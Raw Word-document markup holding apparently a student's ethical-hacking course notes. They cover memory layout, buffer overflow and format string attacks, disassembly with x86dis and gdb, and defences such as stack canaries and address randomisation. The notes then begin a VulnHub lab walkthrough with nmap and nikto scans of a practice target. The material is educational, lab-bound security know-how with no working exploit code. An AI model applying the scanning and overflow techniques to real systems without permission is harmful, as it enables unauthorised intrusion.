        <w:t>- extracts the hidden file from the normal one</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D00A9" w:rsidRDefault="005D00A9" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00F83670" w:rsidRDefault="00F83670" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Steg Analysis – a glitch in the matrix could indicate a hidden file. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D00A9" w:rsidRPr="005D00A9" w:rsidRDefault="005D00A9" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>**Stacks and Heaps</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Memory layout. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A77527" w:rsidRDefault="00A77527" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:color w:val="0000FF"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="2720366" cy="2043257"/>
            <wp:effectExtent l="0" t="0" r="3810" b="0"/>
            <wp:docPr id="5" name="Picture 5" descr="Image result for simple stacks and heaps">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imple stacks and heaps">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3784" cy="2045825"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Low </w:t>
      </w:r>
      <w:r w:rsidR="00A77527">
        <w:t>address</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 00000 - High </w:t>
      </w:r>
      <w:r w:rsidR="00A77527">
        <w:t>address</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> FFFFF</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="00A77527" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Code/</w:t>
      </w:r>
      <w:r w:rsidR="003B567C">
        <w:t>Text - Where all of the program resides. Where all of the exe code lives.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="00A77527" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Static </w:t>
      </w:r>
      <w:r w:rsidR="003B567C">
        <w:t>Data - Any data that we know about during compile time. Global variables...</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A77527" w:rsidRDefault="00A77527" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Heap - gets any memory that is dynamically allocated. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Stack - Memory that gets used in a particular way.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A77527" w:rsidRDefault="00A77527" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>The stack starts at the highest point in the memory and grows down.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">When functions are being used in </w:t>
      </w:r>
      <w:r w:rsidR="00124068">
        <w:t>a program</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> a new stack frame is put on the stack.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00C1360E" w:rsidRDefault="00C1360E" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:color w:val="0000FF"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="3013582" cy="2036387"/>
            <wp:effectExtent l="0" t="0" r="0" b="2540"/>
            <wp:docPr id="6" name="Picture 6" descr="stack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tack1">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8171" cy="2039488"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Function local var</w:t>
      </w:r>
      <w:r w:rsidR="00A77527">
        <w:t>iables</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> - any variable </w:t>
      </w:r>
      <w:r w:rsidR="00124068">
        <w:t>that’s</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> local to a particular function. </w:t>
      </w:r>
      <w:r w:rsidR="00124068">
        <w:t>Predefined</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> data that isn't dynamically allocated.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Base Pointer - which points to the bottom of the stack.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Return Pointer - an instruction pointer. The point we have to jump back to once we are finished with this function.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Calling Parameters - to that particular function. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>**Buffer Overflows</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Fill the buffer with more data than it can handle so it starts to leak memory. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Manipulate the data so that </w:t>
      </w:r>
      <w:r w:rsidR="00C1360E">
        <w:t>I</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> control what gets placed in the Return Pointer field therefore telling the target what code to execute next. Then </w:t>
      </w:r>
      <w:r w:rsidR="00124068">
        <w:t>I</w:t>
      </w:r>
      <w:r w:rsidR="00C1360E">
        <w:t xml:space="preserve"> control the program. </w:t>
      </w:r>
      <w:r>
        <w:t>Making a segmentation Fault.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>**Format String Attacks</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Examples are written in C. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Where a programmer is calling a function that </w:t>
      </w:r>
      <w:r w:rsidR="00124068">
        <w:t>provides</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> a format string however there is no format string so it just grabs data off the top of the stack. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>**DE compilers</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Want to take a dump of binary or hex and make it legible. Decompile back to code. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Big problem is inaccuracy. The translated readable converted to machine readable will do things in different ways. Difficult to know how it was compiled. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Conversion inaccuracies. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Legality - The legality was challenged 20+ years ago. Very strict laws against decompiling a program to raw code so that you can't steal intellectual property.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Flash - Flash assembled / disassembler. Very good tool for using Flash. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Java - harder to find Java </w:t>
      </w:r>
      <w:r w:rsidR="00124068">
        <w:t>de compilers</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> but they are out there.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>**Reverse Engineering Malware</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Different techniques for reverse engineering:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Observe what it does.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Could use a disassembler.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00C1360E">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">x86dis -e 0 -s </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00C1360E">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>intel</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00C1360E">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C1360E">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>bufo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C1360E">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve"> | less</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00C1360E">
        <w:tab/>
      </w:r>
      <w:r>
        <w:t>-- this runs the disassembly program. Creates a file of machine language which is then converted to assembly language (almost readable)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00C1360E">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>gdb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00C1360E">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C1360E">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>bufo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00C1360E">
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00C1360E">
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00C1360E">
        <w:tab/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-- This runs a debugger against the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>bufo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> file</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C1360E" w:rsidRDefault="00C1360E" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Can follow what the program is doing line by line this then allows you to reverse engineer malware.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRPr="00124068" w:rsidRDefault="00124068" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>****</w:t>
      </w:r>
      <w:r w:rsidR="003B567C" w:rsidRPr="00124068">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>BE CAREFUL WITH PATENT LAWS AND INTELLECTUAL PROPERTY</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>****</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Quite a specialised skill. Not many ethical </w:t>
      </w:r>
      <w:r w:rsidR="00124068">
        <w:t>hackers’</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00124068">
        <w:t>possess</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>**Protecting Against Buffer Overflow Attacks</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">To protect from a buffer overflow attack. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Do it from a programming perspective. Goes back in to programming language again.... eek. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="00C1360E" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>But you c</w:t>
      </w:r>
      <w:r w:rsidR="003B567C">
        <w:t xml:space="preserve">an't rely on all programmers to do the right thing. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C1360E" w:rsidRDefault="00C1360E" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">How to protect the OS from the Kernel. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00C1360E">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Configuring </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">that the only thing executable is in Low Memory and that nothing else in the stack can execute. You can't inject code into the stack to execute code you've </w:t>
      </w:r>
      <w:r w:rsidR="00124068">
        <w:t>just</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> inserted.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00C1360E">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Randomise the memory locations</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="00124068">
        <w:t>Every time</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> you run the program it is given a different address space. Can no longer predict the memory location that the return pointer will point to. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00C1360E">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Stack Canary</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> - Where we place a piece of data in front of the return pointer that we knew about ahead of time. So when it comes to returning from the function we could check the stack canary against the </w:t>
      </w:r>
      <w:r w:rsidR="00124068">
        <w:t xml:space="preserve">memory canary </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">and </w:t>
      </w:r>
      <w:r w:rsidR="00124068">
        <w:t xml:space="preserve">see </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">if the values differ in any ways then the return pointer has been corrupt in some way. Value </w:t>
      </w:r>
      <w:r w:rsidR="00124068">
        <w:t>comparison</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00211D33" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>********** AWAITING PART II **********</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00214E0E" w:rsidRDefault="00214E0E" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00214E0E" w:rsidRDefault="00214E0E" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00214E0E" w:rsidRDefault="00214E0E" w:rsidP="00263D34">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>**Practical Web-App Hacking</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00214E0E" w:rsidRPr="00EF4EBF" w:rsidRDefault="00214E0E" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EF4EBF">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Mr. Robot VM from </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EF4EBF">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>VulnHub</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="00214E0E" w:rsidRDefault="00214E0E" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Mkdir</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>unihack</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> – make a directory for the hack.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00214E0E" w:rsidRDefault="00214E0E" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Start a </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>leafpad</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> – document everything, add to </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>leafpad</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00214E0E" w:rsidRDefault="00214E0E" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Identify the IP of target</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00214E0E" w:rsidRDefault="00214E0E" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:i/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>Nmap –A –T4 –n –p- 10.10.10.10</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00F02F40">
        <w:t xml:space="preserve">- run this, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00F02F40">
        <w:t>xmas</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00F02F40">
        <w:t>, and UDP scan</w:t>
      </w:r>
      <w:r>
        <w:t>, output to a new file</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00214E0E" w:rsidRDefault="00214E0E" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Port 80 &amp; 443 is open</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00214E0E" w:rsidRDefault="00214E0E" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Visit the site on port 80 – turn Burp on, but Intercept OFF so it’s passively gathering info.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00214E0E" w:rsidRDefault="00214E0E" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Click on every link, see what everything does. Look around. View Page Source. Look in robots.txt</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00214E0E" w:rsidRDefault="00214E0E" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00584C37">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">Nikto –h </w:t>
      </w:r>
      <w:hyperlink r:id="rId14" w:history="1">
        <w:r w:rsidRPr="00CF6AEE">
